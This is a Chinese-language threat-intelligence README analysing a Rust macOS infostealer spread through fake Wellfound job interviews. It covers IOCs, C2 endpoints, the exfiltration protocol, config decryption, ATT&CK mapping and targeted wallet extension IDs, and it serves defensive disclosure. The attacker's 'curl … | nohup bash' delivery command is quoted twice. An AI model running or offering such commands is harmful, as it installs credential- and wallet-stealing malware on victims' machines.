完整静态分析 HyperHive macOS Rust 信息窃取器 — 571 个解密配置值、C2 基础设施、DPRK/Contagious Interview 归因、YARA/Sigma 规则、STIX 2.1 包、ATT&CK Navigator 层
威胁情报: 基于Rust的macOS通用二进制信息窃取器,通过Wellfound(原名AngelList)上的虚假面试流程投递。操作者身份为来自"HyperHive"的"Felix",诱骗目标从
macos.hyperhives.net运行恶意安装程序。本仓库记录了完整的静态分析:571个加密配置值已恢复,包括C2 URL、Sentry DSN以及276个被针对的Chrome扩展ID。
| 样本 SHA-256 | 5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3 |
| C2 域名 | cloudproxy.link |
| 交付域名 | macos.hyperhives.net |
| 诱饵平台 | Wellfound(原名AngelList) |
| 操作者身份 | "Felix" 来自 "HyperHive" |
| VirusTotal | 9 / 63 检测 |
| 分类 | 公开披露 / IOC 包 |
| 最后更新 | 2026年4月 |
. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist
---
## 快速开始
将样本放在 `sample/installer_binary` 目录下(哈希验证请参见 [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md)),然后:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py
The compose file enforces network_mode: none, read_only: true,并丢弃所有 Linux 功能。完整处理指南请参见 SECURITY.md。
在 Wellfound(原 AngelList)上的一则招聘信息引发了一个多邮件的社会工程链,来自操作者角色 "Felix" 和 "HyperHive"。在夸奖目标的技术背景并安排了一场虚假面试后,攻击者指示受害者“审查产品”于 hyperhives.net,并特别检查 Settings → Diagnostics → Log —— 这一借口旨在触发执行:```
curl -s https://macos.hyperhives.net/install | nohup bash &
该有效负载是一个**8.5 MB 的 Mach-O 通用二进制文件**(x86_64 + arm64),使用 Rust 编译。通过隔离的 Docker 实验室和 CPU 仿真对 **570 个独特的 x86_64 辅助例程**进行静态分析,恢复了**所有 571 个加密配置值**,揭示了:
- **C2:** `cloudproxy.link` — 四个 HTTPS 端点
- **Sentry(归属分析枢纽):** 完整的 DSN,包含 `ingest.de.sentry.io` 上的组织/项目 ID
- **构建身份:** Cargo 用户 `rootr`,代号 `force`,版本 `9.12.1`
- **目标:** 276 个 Chrome 扩展 ID(加密货币钱包、密码管理器、企业凭证)
这些策略与**朝鲜关联的 Contagious Interview** 活动一致——在合法平台上的虚假招聘、多步骤信任构建、`curl | bash` 交付、Rust macOS 窃取器以及针对加密货币的窃取。
---
## 1 — 攻击的起点
### 诱饵:Wellfound 上的虚假求职面试
攻击始于在 **Wellfound**(原 AngelList)上发布的一个**看似合法的职位信息**。目标申请后,以下邮件链从一位化名 **"Felix"**、公司名为 **"HyperHive"** 的操作者发出:
**邮件 1**(2026 年 4 月 4 日)—— 初次接触。"Felix" 确认了目标的简历和 LinkedIn,声称他们的"技术主管"批准了下一步,并特别提到了目标真实的技术经验。邮件称 HyperHive 正在"构建跨不同操作系统的 Hyperhives 桌面版本",并邀请目标在 UTC+0 时区安排面试。
**邮件 2**(2026 年 4 月 5 日)—— 后续安排。提议了具体的面试时间(2026 年 4 月 8 日 15:00 UTC),并包含了关键的有效负载交付指令:
> *"如果您可以的话,请也快速查看一下 **设置 → 诊断 → 日志** 下的产品日志。我们可能会要求您对日志以及您注意到的其他产品观察结果做一些简要评论,因为这通常是工程经验和关注细节的良好信号。"*
这将目标引导至 `https://hyperhives.net`,导航到诊断部分后触发了:```
curl -s https://macos.hyperhives.net/install | nohup bash &
该命令下载并执行了一个8.5 MB的 Mach-O 通用二进制文件。通过 AppleScript 弹出了一个虚假的 macOS 密码对话框。**密码未被输入。**进程立即终止,样本被保留供分析。
该样本展现出生产级工程水准:语义化版本管理、Sentry 集成以保障运行可靠性,以及一个包含570个独特辅助函数加密的大型嵌入式配置。
完整报告 — 截至首次提交(2026年4月),63个引擎中有9个检测到。超过85%的引擎未能标记该样本。
用于交叉引用的知名厂商家族名称:HashBreaker (Kaspersky)、JobStealer (DrWeb)、PSW.Agent.BX (ESET)、Stealer-BU (Avast/AVG)。
未被检测到的厂商包括: BitDefender、CrowdStrike Falcon、Sophos、Symantec、McAfee、Malwarebytes、TrendMicro、Fortinet、ClamAV、Panda 及其他44个引擎。这种低检测率凸显了该活动所使用的 Rust 结合自定义混淆方法的操作有效性。
检测比率会随厂商更新签名而变化。请查看 VirusTotal 报告 获取最新结果。
窃取的数据类型: 密码、信用卡信息、Cookie、会话令牌、自动填充数据、浏览历史。
login.keychain-db) — 需要通过虚假对话框窃取的用户密码IOPlatformExpertDevice / IOPlatformUUID,作为 hardwares 上报至 C2tdata 会话资料,用于完全接管账户全面针对浏览器扩展钱包,包括 MetaMask、Phantom、Trust Wallet、Ronin、Exodus、OKX、Bybit、Bitget、SubWallet、Ledger Live 和 Trezor Suite。完整映射参见第8节及 output/full_decrypted_config.json。
| 功能 | 详情 |
|---|---|
| VM 检测 | C2 JSON 中的 is_vm 标志 |
| 强制模式 | force_mode 远程覆盖标志 |
数据暂存于 ~/Documents/temp_data/Application/ 目录,压缩为 ZIP,通过 HTTPS 的 multipart/form-data 上传。受害者 IP 和地理位置通过 https://freeipapi.com/api/json 解析。
| 端点 | 角色 |
|---|---|
https://cloudproxy.link/m/opened | 信标 / 激活 |
https://cloudproxy.link/m/metrics | 遥测 |
https://526eff9f8bb7aafd7117ca5e33a6a183@o4509139651198976.ingest.de.sentry.io/4509422649213008
| 组件 | 值 |
|-----------|-------|
| **公钥** | `526eff9f8bb7aafd7117ca5e33a6a183` |
| **组织 ID** | `4509139651198976` |
| **项目 ID** | `4509422649213008` |
| **区域** | EU — `ingest.de.sentry.io` |
通过 Sentry 的合法流程可能获取到与此组织/项目关联的账户注册信息、账单记录及访问元数据。
### 地理位置 API
`https://freeipapi.com/api/json` — 受害者 IP / 国家,用于 C2 JSON(`ipAddress`、`countryCode`)。
### C2 外泄协议
| 字段 | 作用 |
|-------|------|
| `buildName` / `buildVersion` | `force` / `9.12.1` |
| `uid`、`log_id` | 受害者/会话标识 |
| `ip`、`geo` | 来自地理位置 API |
| `pers_password` | 假对话框密码 |
| `passwords`、`wallets`、`credits`、`autofills` | 窃取的材料 |
| `is_vm`、`hardwares`、`force_mode` | 环境/控制标志 |
上传方式:`multipart/form-data`、`application/zip`,连接字符串 `UPLD connect`。
---
## 5 — 关联归因
### 入侵指标
| 指标 | 值 | 来源 |
|-----------|-------|--------|
| 诱饵平台 | Wellfound (AngelList) | 受害者报告 |
| 操作者身份 | "Felix" at "HyperHive" | 诱饵邮件 |
| 诱饵网站 | `hyperhives.net` | 诱饵邮件 |
| 发件人邮箱 | `[email protected]` | 诱饵邮件 |
| 投递域名 | `macos.hyperhives.net` | 载荷下载 |
| 投递 IP | `81.28.12.12` (Gcore CDN) | DNS 解析 |
| 注册商/邮箱 | Tucows; Spacemail | WHOIS / MX |
| **C2 域名** | **`cloudproxy.link`** | **从样本解密** |
| **Sentry DSN** | 见 [第 4 节](#sentry-dsn-operator-fingerprint) | **从样本解密** |
| 构建用户 | `rootr` | 嵌入的 Cargo 路径 |
| 样本 SHA-256 | `5c7385c3...bf8dd3` | 文件哈希 |
### 开发者代号:`rootr`
嵌入路径 `/Users/rootr/.cargo/registry/`。对该代号的开源情报调查([github.com/rootr](https://github.com/rootr) 截至分析日期):所属公司 "RootR",位置日内瓦,账户创建于 **2024-06-27**,零个公开仓库。与一次性或操作型配置文件一致。
### 朝鲜/传染性面试(分析评估)
| TTP | 此样本 | 已报告的朝鲜相关模式 |
|-----|-------------|--------------------------------|
| **在合法平台发起虚假招聘** | Wellfound (AngelList) 发帖 → 与 "Felix" 的邮件往来 | 传染性面试:LinkedIn、Indeed、Wellfound 上的虚假招聘者联系 |
| **多步骤社会工程** | 2 封以上邮件提及真实简历、安排虚假面试 | 建立信任后再投递载荷;多个朝鲜行动中均有记录 |
| **产品评测/代码测试借口** | "检查设置 → 诊断 → 日志" | "审查我们的项目"/"运行这个代码测试"等借口 |
| `curl \| bash` 投递 | 从 `macos.hyperhives.net` 安装单行命令 | 常见的 macOS 社会工程向量 |
| Rust Mach-O 通用二进制 | rustc 1.87.0, x86_64 + arm64 | RustDoor / RustBucket 等相似家族 |
| 假密码对话框 | AppleScript `osascript` | 相关 macOS 行动中已有记录 |
| 大量加密货币钱包目标集 | 276 个扩展 ID,188 个钱包名称 | 财务动机与朝鲜创收一致 |
**置信度:** **高**,基于主题和 TTP 的对齐。Wellfound 虚假招聘管道、多邮件信任链、产品评测借口、Rust macOS 窃密器以及加密货币钱包焦点与传染性面试战术手册高度吻合。此为分析评估,并非政府或执法机构的归因声明。
---
## 6 — 密码分析
配置字符串受 **自定义 XOR 加密** 保护:570 个小型的 x86_64 辅助函数(代码范围 `0x10000`–`0x15000`)各自根据 `(data_ptr, seed)` 计算一个唯一的 16 位偏移量。该偏移量指向二进制文件中的某个位置,从而产生一个 32 字节的 XOR 密钥,用于解密对应的密文块。
### 失败的方法
| 方法 | 结果 |
|--------|---------|
| 朴素的 XOR 扫描 | 未发现连贯明文 |
| AES / PBKDF2 密钥猜测 | 未找到密钥调度 |
| 完整二进制的 Unicorn 模拟 Rust 运行时 | 控制流复杂性导致发散 |
### 成功的方法
1. **扫描** 针对配置区域 (`0x2b8000`–`0x2bc000`) 的 RIP 相对 `LEA` 指令。
2. **解析** 前面的代码以提取 `(helper_function_address, data_pointer, seed)`。
3. **模拟** 使用 [Unicorn Engine](https://www.unicorn-engine.org/) 隔离执行每个辅助函数(最多 200 条指令)。
4. **XOR 解密** 利用计算得出的偏移量处的密钥,解密目标地址上的 32 字节块。
5. **扩展** 用于多块字符串(URL、DSN)和 OR+XOR 元数据条目。
**覆盖率:** 381 个 XOR 块 + 190 个 OR+XOR 元数据条目 = 1.1 秒内恢复 **571 个配置值**。零个未能恢复的加密条目。
**实现:** [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py)
---
## 7 — MITRE ATT&CK 映射
> 将 [`attack-navigator-layer.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/attack-navigator-layer.json) 导入 [ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/) 以获得交互式视图。
| 技术 | ID | 本样本中的使用 |
|-----------|----|--------------------|
| 钓鱼攻击 | T1566 | 来自 `[email protected]` 的社会工程邮件 |
| 用户执行:恶意文件 | T1204.002 | 从诱饵 `curl \| bash` |
| 命令和脚本解释器:AppleScript | T1059.002 | 假密码对话框、Apple Notes 外泄 |
| 命令和脚本解释器:Unix Shell | T1059.004 | 通过管道 bash 初始执行 |
| 从密码库获取凭据:钥匙串 | T1555.001 | 登录钥匙串提取 |
| 从密码库获取凭据:从 Web 浏览器获取凭据 | T1555.003 | Chromium Login Data 解密 |
| 窃取 Web 会话 Cookie | T1539 | 浏览器 cookie 和令牌窃取 |
| 从本地系统获取数据 | T1005 | 钱包、Telegram、Notes、自动填充 |
| 收集的数据归档 | T1560 | 在 `~/Documents/temp_data/` 下打包 ZIP |
| 通过 C2 通道外泄 | T1041 | HTTPS POST 到 `cloudproxy.link` |
| 应用层协议:Web 协议 | T1071.001 | 具有四个端点的 HTTPS C2 |
| 虚拟化/沙箱规避 | T1497 | `is_vm` 标志 |
| 混淆文件或信息 | T1027 | 570 个 XOR 辅助函数 |
| 输入捕获 | T1056 | 假密码对话框 |
| 系统信息发现 | T1082 | 硬件 ID 和操作系统版本收集 |
| 系统网络配置发现 | T1016 | `freeipapi.com` 地理位置 |
| 颠覆信任控制:Gatekeeper 绕过 | T1553.001 | 对下载的二进制文件执行 `xattr -c` |
---
## 8 — 钱包和扩展 ID 参考
已恢复 188 个钱包名称和 **276 个唯一** 32 字符 Chrome 扩展 ID。下表列出了高价值目标;完整列表见 [附录 A](#appendix-a--all-276-chrome-extension-ids) 和 `output/full_decrypted_config.json`。
| 钱包 | 扩展 ID |
|--------|--------------|
| MetaMask | `hnfanknocfeofbddgcijnmhnfnkdnaad` |
| Phantom | `bfnaelmomeimhlpmgjnjophhpkkoljpa` |
| Trust Wallet | `egjidjbpglichdcondbcbdnbeeppgdph` |
| Ronin | `fnjhmkhhmkbjkkabndcnnogagogbneec` |
| Exodus Web3 | `aholpfdialjgjfhomihkjbmgjidlcdno` |
| OKX | `mcohilncbfahbmgdjkbpemcciiolgcge` |
| Bybit | `pdliaogehgdbhbnmkklieghmmjkpigpa` |
| Bitget | `jiidiaalihmmhddjgbnbgdfflelocpak` |
| SubWallet | `onhogfjeacnfoofkfgppdlbmlmnplgbn` |
| Coinbase Wallet | `hnfanknocfeofbddgcijnmhnfnkdnaad` |
**桌面钱包:** Ledger Live 和 Trezor Suite 数据目录同样被列为目标。
**重要提示:** 这些扩展 ID 标识的是**合法的浏览器扩展**,恶意软件旨在窃取其本地数据。它们**并非**恶意扩展。
---
## 9 — 建议措施
### 对潜在受害者
- **不要**运行未知的 `curl | bash` 一行命令
- 如果已暴露,轮换所有浏览器中存储的凭据、加密货币钱包密钥和密码管理器主密码
- 检查磁盘上是否存在 `~/Documents/temp_data/`
- 向当地执法部门和相关国家 CERT(如 IC3、NCSC)报告
### 对防御者
- **屏蔽** `macos.hyperhives.net`、`cloudproxy.link` 和 `81.28.12.12`(屏蔽 IP 前请确认共享主机影响)
- **搜索** 发往 `cloudproxy.link` 的 HTTPS 流量以及针对这两个域名的 DNS 查询
- **部署** 本仓库中的 YARA 和 Sigma 规则(根据你的环境调优)
- **比对** 已安装的 Chrome 扩展与 276 个 ID 列表(这些扩展是合法的——恶意软件读取它们的本地数据)
- **导入** 将 `stix/bundle.json` 导入你的 CTI 平台(MISP、OpenCTI、ThreatConnect 等)
### 对合法调查
| 目标 | 请求内容 |
|--------|-----------------|
| Sentry | 组织 `4509139651198976` 的账户和账单记录 |
| 域名注册商 | `cloudproxy.link` 和 `hyperhives.net` 的 WHOIS 记录 |
| Gcore CDN | `81.28.12.12` 的访问日志 |
| 邮箱提供商 | `[email protected]` 的账户记录 |
| GitHub | `rootr` 的账户元数据 |
---
## 10 — 方法论
分析在 **Docker 容器** 中进行,配置包括:
- `network_mode: none`(无出站连接)
- `read_only: true`(不可变根文件系统)
- 删除所有 Linux 能力(`cap_drop: ALL`)
- `no-new-privileges` 安全选项
工具:Python(LIEF、Unicorn Engine、Capstone、r2pipe)、Radare2 以及自定义脚本。未对恶意软件进行动态执行——所有发现均源于静态分析和单个辅助函数的隔离 CPU 模拟。
已验证的产物: [`scripts/decrypt_all.py`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/scripts/decrypt_all.py)、[`output/full_decrypted_config.json`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/output/full_decrypted_config.json)。
---
## 附录 A — 所有 276 个 Chrome 扩展 ID
恶意软件配置中引用了这些扩展 ID(用户配置文件下的 local-storage / LevelDB 路径)。**这些 ID 标识的是被恶意软件作为数据窃取目标的合法扩展,并非恶意扩展。**```
abkahkcbhngaebpcgfmhkoioedceoigp abogmiocnneedmmepnohnhlijcjpcifd
acmacodkjbdgmoleebolmdjonilkdbch aeachknmefphepccionboohckonoeemg
aeblfdkhhhdcdjpifhhbdiojplfjncoa afbcbjpbpfadlkmhmclhkeeodmamcflc
afccgfbnbpgfdokbllhiccepgggofoco aflkmfhebedbjioipglgcbcmnbpgliof
agoakfejjabomempkjlepdflaleeobhb ahkpfejaeoepmfopmbhjgjekibmfcfgo
aholpfdialjgjfhomihkjbmgjidlcdno aiifbnbfobpmeekipheeijimdpnlpgpp
aijcbedoijmgnlmjeegjaglmepbmpkpi ajofhbfomojicfifgoeeimefklkfdkfn
ajopcimklncnhjednieoejhkffdolemp akckefnapafjbpphkefbpkpcamkoaoai
akkmagafhjjjjclaejjomkeccmjhdkpa algblmhagnobbnmakepomicmfljlbehg
amdcajcnofodjpgbbdnnjkffamfnidae amkmjjmmflddogmhpjloimipbofnfjih
ammjlinfekkoockogfhdkgcohjlbhmff anokgmphncpekkhclmingpimjmcooifb
aodkkagnadcbobfpggfnjeongemjbjca aoedbjimepepemdafoodplnknfkmbnle
apgjfbcibghlclbdiipmojppngeilcol bbjmepflljbbfaehppakknfgdnojoled
bccippoanbhflmokhkbkepmhmndijenh bcpialkijhffpgnmgjhjmdeabdbbfmbo
bdgmdoedahdcjmpmifafdhnffjinddgc bfeplaecgkoeckiidkgkmlllfbaeplgm
bflldjbbpcjgooclhpmhdhioebmnnkcm bfnaelmomeimhlpmgjnjophhpkkoljpa
bgjogpoidejdemgoochpnkmdjpocgkha bhhhlbepdkbapadjdnnojkbgioiodbic
bhmbcdekobebkhmloafbjfdcphbmpcnm bidcmgjdfgkagkleecdockomdjlgglbg
bifidjkcdpgfnlbcjpdkdcnbiooooblg blnieiiffboillknjnepogjhkgnoapac
bmkakpenjmcpfhhjadflneinmhboecjf bmmhjnaohafphhlecmkkiaaglcebcapn
bodadjcgfgigmmnambomndppidgdjlni bplepbelihejfpcjoeialhjpamgpnfln
caalbmclnkldkcgcdkfiapoopikbofnl cgeeodpfagjceefieflmdfphplkenlfk
cihmoadaighcejopammfbmddcmdekcje ciojocpkclfflombbcfigcijjcbkmhaf
cjelfplplebdjjenllpjcblmjkfcffne ckklhkaabbmdjkahiaaplikpdddkenic
cmbagcoinhmacpcgmbiniijboejgiahi cmoakldedjfnjofgbbfenefcagmedlga
cnmbailpgmdagpofalkeoeooefdkjfdl cnncmdhjacpkmjmkcafchppbnpnhdmon
cnoepnljjcacmnjnopbhjelpmfokpijm codfcglpplgmmlokgilfkpcjnmkbfiel
cpmkedoipcpimgecpmgpldfpohjplkpp dbgnhckhnppddckangcjbkjnlddbjkna
dcbjpgbkjoomeenajdabiicabjljlnfp dfbacijefbcabjnngipfnbhcpoldlkcg
dkdedlpgdmmkkfjabffeganieamfklkm dlcobpjiigpikoobohmabehhmhfoodbb
dldjpboieedgcmpkchcjcbijingjcgok dmjmllblpcbmniokccdoaiahcdajdjof
dngmlblcodfobpdpecaadgfbcggfjfnm dpcklmdombjcplafheapiblogdlgjjlb
dpdmipjakdiapplcecdmgckknipnfjph dpealdfjgahljjdekeiadjnfgpijffhg
dpmfhilhjlhhakpbieclcghochdofeao eaeecbmeajhliilmacefcgjnnijkkfki
ebaeifdbcjklcmoigppnpkcghndhpbbm ebfidpplhabeedpnhjnobghokpiioolj
efbglgofoippbgcjepnhiblaibcnclgk egjidjbpglichdcondbcbdnbeeppgdph
ehgjhhccekdedpbkifaojjaefeohnoea ehjiblpccbknkgimiflboggcffmpphhp
ejbalbakoplchlghecdalmeeeajnimhm ejbidfepgijlcgahbmbckmnaljagjoll
ejdmhlhkcfbkcoifejkcbonhodkgflgg ejjladinnckdgjemekebdpeokbikhfci
elalghlhoepcjfaedkcmjolahamlnjcp eljobehkpcnpekmbcjiidekjhkbcnpkf
ellkdbaphhldpeajbepobaecooaoafpg emafjfadeeammocialbgjbaeldmpddne
emeeapjkbcbpbpgaagfchmcgglmebnen emgcpdnckldpdhjgmkeeahfaokmhgpab
enabgbdfcbaehmbigakijjabdpdnimlg epapihdplajcdnnkdeiahlgigofloibg
fajmdbbmcncahahilpfdiacamedmgdlk fbplgegfggencanbeceipjpanlmgpkfi
fcckkdbjnoikooededlapcalpionmalo fcfcfllfndlomdhbehjjcoimbgofdncg
fcjkomdnccnlklmhncgmaehaakjkddnk fdchdcpieegfofnofhgdombfckhbcokj
fdcnegogpncmfejlfnffnofpngdiejii fdjamakpfbbddfjaooikfcpapjohcfmg
fhbohimaelbohpjbbldcngcnapndodjp fhilaheimglignddkjgofkcbgekhenbh
fhmmkjofdcpnoklcbcnbjjhigobceikb fihkakfobkmkjojpchpfgcmhfjnmnfpi
fijngjgcjhjmmpcmkeiomlglpeiijkld fjghjobbfggoacelnibacipoilennobn
fldfpgipfncgndfolcbkdeeknbbbnhcc fmpbldieijjehhalgjblbpgjmijencll
fnabdmcgpkkjjegokfcnfbpneacddpfh fnjhmkhhmkbjkkabndcnnogagogbneec
fnnegphlobjdpkhecapkijjdkgcjhkib fopmedgnkfpebgllppeddmmochcookhc
fpibioaihcagphbidhodidjbnclocgll fpkhgmpbidmiogeglndfbkegfdlnajnf
gbjepgaebckfidagpfeioimheabiohmg gdokollfhmnbfckbobkdbakhilldkhcj
gejiddohjgogedgjnonbofjigllpkmbf ghihpcdpbjaaomhlfnhdlocimojkinpm
ghlmndacnhlaekppcllcpcjjjomjkjpg ghmbeldphafepmbegfdlkpapadhbakde
gjlmehlldlphhljhpnlddaodbjjcchai gkeelndblnomfmjnophbhfhcjbcnemka
gkhnjcpkikkkfhhdhhphcbhmkikoicgn gkpbmnplcjdnnmmiaaphofhdiicdhfah
glhefpglgefbmegkpjkdgoikologepdl hbbgbephgojikajhfbomhlmmollphcad
hbdheoebpgogdkagfojahleegjfkhkpl hbinmkhlebcnghpikoekkbeljbealbje
hbneiaclpaaglopiogfdhgccebncnjmc hbnpcbochkgodkmmicbhfpmmkhbfbhim
hddkffjleepiafmkhcneldjipkfkkofk hdokiejnpimakedhajhdlcegeplioahd
heefohaffomkkkphnlpohglngmbcclhi hgbeiipamcgbdjhfflifkgehomnmglgk
hgnpaljkalilofmmbhgkkldbdbogddlo hifafgmccdpekplomjjkcfgodnhcellj
hlbmghfhijdlnllnnnakmcagdfhhkfna hmeobnfnfcmdkdcmlblgagmfpfboieaf
hnfanknocfeofbddgcijnmhnfnkdnaad hnhobjmcibchnmglfbldbfabcgaknlkj
hpbgcgmiemanfelegbndmhieiigkackl hpclkefagolihohboafpheddmmgdffjm
hpglfhgfnhbgpjdenjgmdgoeiappafln hpjiiechbbhefmpggegmahejiiphbmij
ibjflpbmadchofnbpppegdbnifdgincp ibljocddagjghmlpgihahamcghfggcjc
ibnejdfjmmkpcnlpebklmnkoeoihofec icmkfkmjoklfhlfdkkkgpnpldkgdmhoe
idnnbdplmphpflfnlkomgpfbpcgelopg idpfplgehakelkdadhcacicjjbemjbke
ifckdpamphokdglkkdomedpdegcjhjdp ifclboecfhkjbpmhgehodcjpciihhmif
ifgjklbmlnimhldbmddmkdhoahfocppf ikcpjgihikfinlkobegiiogdigohmfam
ilhaljfiglknggcoegeknjghdgampffk imlcamfeniaidioeflifonfjeeppblda
iokeahhehimjnekafflcihljlcjccdbe jaooiolkmfcmloonphpiiogkfckgciom
jbdaocneiiinmjbjlgalhcelgbejmnid jccapkebeeiajkkdemacblkjhhhboiek
jfdlamikmbghhapbgfoogdffldioobgl jfflgdhkeohhkelibbefdcgjijppkdeb
jhjebgdkdemiibiibgickfkilfpbelaj jhnilbocebbmeelaolalihfokjgdmogb
jicpmdkafljkkppgpellcjhfhdmjpogm jiepnaheligkibgcjgjepjfppgbcghmp
jiidiaalihmmhddjgbnbgdfflelocpak jjkhekbaikcnpnhflnnlnbonkkobkiim
jljjeghmeihjegifdhbghcoihdiegkkl jmgipjhlmabpmcikcahmmgleghckefjg
jnggcdmajcokeakpdeagdhphmkioabem jnldfbidonfeldmalbflbmlebbipcnle
jnlgamecbpmbajjfhmmmlhejkemejdma jojhfeoedkpkglbfimdfabpdfjaoolaf
kdgponmicjmjiejhifbjgembdcaclcib keenhcnmdmjjhincpilijphpiohdppno
kfdniefadaanbjodldohaedphafoffoh kgdijkcfiglijhaglibaidbipiejjfdp
khgocmkkpikpnmmkgmdnfckapcdkgfaf khpkpbbcccdmmclmpigdgddabeilkdpd
kilnpioakcdndlodeeceffgjdpojajlo kjjebdkfeagdoogagbhepmbimaphnfln
kkpehldckknjffeakihjajcjccmcjflh kkpllbgjhchghjapjbinnoddmciocphm
kkpllkodjeloidieedojogacfhpaihoh klghhnkeealcohjjanjjdaeeggmfmlpl
kmphdnilpmdejikjdnlbcnmnabepfgkh kncchdigobghenbbaddojjnnaogfppfj
kolfcecahpbgbilkdkalabnfjjklkkae kpfopkelmapcoipemfendmdcghnegimn
kppfdiipphfccemcignhifpjkapfbihd kppgpfphbmbcgeglphjnhnhibonmebkn
lccbohhgfkdikahanoclbdmaolidjdfl ldcihfaojdpmhjkhioilfjjckehehddg
lfmmjkfllhmfmkcobchabopkcefjkoip lgmpcpglpngdoalbgeoldeajfclnhafa
lkpmkhpnhknhmibgnmmhdhgdilepfghe llakdhpogpnejheknjbhbadoaomejgbi
lmkncnlpeipongihbffpljgehamdebgi lnnnmfcpbkafcpgdilckhmhbkkbpkmid
loinekcabhlmhjjbocijdoimmejangoa lpfcbjknijpeeillifnkikgncikgfhdo
lpilbniiabackdjcionkobglmddfbcjo magbanejlegnbcppjljfhnmfmghialkl
mapbhaebnddapnmifbbkgeedkeplgjmf mcbigmjiafegjnnogedioegffbooigli
mcohilncbfahbmgdjkbpemcciiolgcge mdjjoodeandllhefapdpnffjolechflh
mdjmfdffdcmnoblignmgpommbefadffd mdnaglckomeedfbogeajfajofmfgpoae
mfgccjchihfkkindfppnaooecgfneiii mfiealgchgibibbamfjebflnfjihfedk
mgbfflhghaohmaecmaggieniidindaoc mgfbabcnedcejkfibpafadgkhmkifhbd
mgffkfbidihjpoaomajlbgchddlicgpn mjgkpalnahacmhkikiommfiomhjipgjn
mkchoaaiifodcflmbaphdgeidocajadp mkjjflkhdddfjhonakofipfojoepfndk
mkpegjkblkkefacfnmkajcjmabijhclg mlbnicldlpdimbjdcncnklfempedeipj
mlhakagmgkmonhdonhkpjeebfphligng mmmjbcfofconkannjonfmjjajpllddbg
mnfifefkajgofkcjkemidiaecocnkjeh mnnkpffndmickbiakofclnpoiajlegmg
modjfdjcodmehnpccdjngmdfajggaoeh nanjmdknhkinifnkgdcggcfnhdaammmj
nankopfjhdflikcokhgohiaoehnjfako nbdhibgjnjpnkajaghbffjbkcgljfgdi
nbdpmlhambbdkhkmbfpljckjcmgibalo nebnhfamliijlghikdgcigoebonmoibm
nfaepmamdapehcbedhejbjcpnlcldodi nfinomegcaccbhchhgflladpfbajihdf
ngakogceekkandcbkniokoghdckjhhok nglnaekfdaelelcaokeemlnopjhekdkj
nhlnehondigmgckngjomcpcefcdplmgc nhnkbkgjikgcigadomkphalanndcapjk
niiaamnmgebpeejeemoifgdndgeaekhe njoljnomkdoakfphjbapdopdcneceeaf
nkbihfbeogaeaoehlefnkodbefgpgknn nkddgncdjgjfcddamfgcmfnlhccnimig
nknhiehlklippafakaeklbeglecifhad nlbmnnijcnlegkjjpcfjclmcfggfefdm
nlgnepoeokdfodgjkjiblkadkjbdfmgd nopnfnlbinpfoihclomelncopjiioain
nphplpgoakhhjchkkhmiggakijnkhfnd ocjdpmoallmgmjbbogfiiaofphbjgchh
ocjobpilfplciaddcbafabcegbilnbnb ocmccklecaalljlflmclidjeclpcpdim
odbfpeeihdkbihmopkbjmoonfanlbfcl oehdbmfbnjnpahadljbdcjndmepmgjgl
ofeeamlegilfbjlgbephmdhchpblfigo ohjgojhmjldjfiningdelbffpnddmiphh
ojggmchlghnjlapmfbnjholfjkiidbch oklkeijlcjcpbokmkmnjepjhnggkfkcl
oldojieloelkkfeacfinhcngmbkepnlm olgpchjlegmakkhfbahgnjojlefnealp
olkbchllhcflpbjfgagahpkjnjioiedg omaabbefbmiijedngplfjmnooppbclkk
omajpeaffjgmlpmhbfdjepdejoemifpe onhogfjeacnfoofkfgppdlbmlmnplgbn
ooiepdgjjnhcmlaobfinbomgebfgablh ookjlbkiijinhpmnjffcofjonbfbgaoc
opcgpfmipidbgpenhmajoajpbobppdil oponnjpnbhdmohlkonljdfhbeibljfoa
oppceojapmdmhpnmjpballbbdclocdhj panpgppehdchfphcigocleabcmcgfoca
pdadjkfkgcafgbceimcpbkalnfnepbnk pdgbckgdncnhihllonhnjbdoighgpimk
pdliaogehgdbhbnmkklieghmmjkpigpa pdlocjdlejekdbpghdcmedeacpkfiiof
peigonhbenoefaeplkpalmafieegnapj penjlddjkjgpnkllboccdgccekpkcbin
pgiaagfkgcbnmiiolekcfmljdagdhlcm pgojdfajgcjjpjnbpfaelnpnjocakldb
phkbamefinggmakgklpkljjmgibohnba pmmbeeacafhbpgmlkacpadheejlhhkbf
pnndplcbkakcplkjnolgbkdgjikjednm pnphepacpjpklpbacfmebicbgndobakn
pocmplpaccanhmnllbbkpgfliimjljgo pogabilnghhbafaheaepaaeopjpleimd
ppbibelpcjmhbdihakflkdcoccbgbkpo ppdadbejkmjnefldpcdjhnkpbjkikoip
请参阅CHANGELOG.md获取版本更新。
请参阅CONTRIBUTING.md了解指南、问题模板和PR清单。
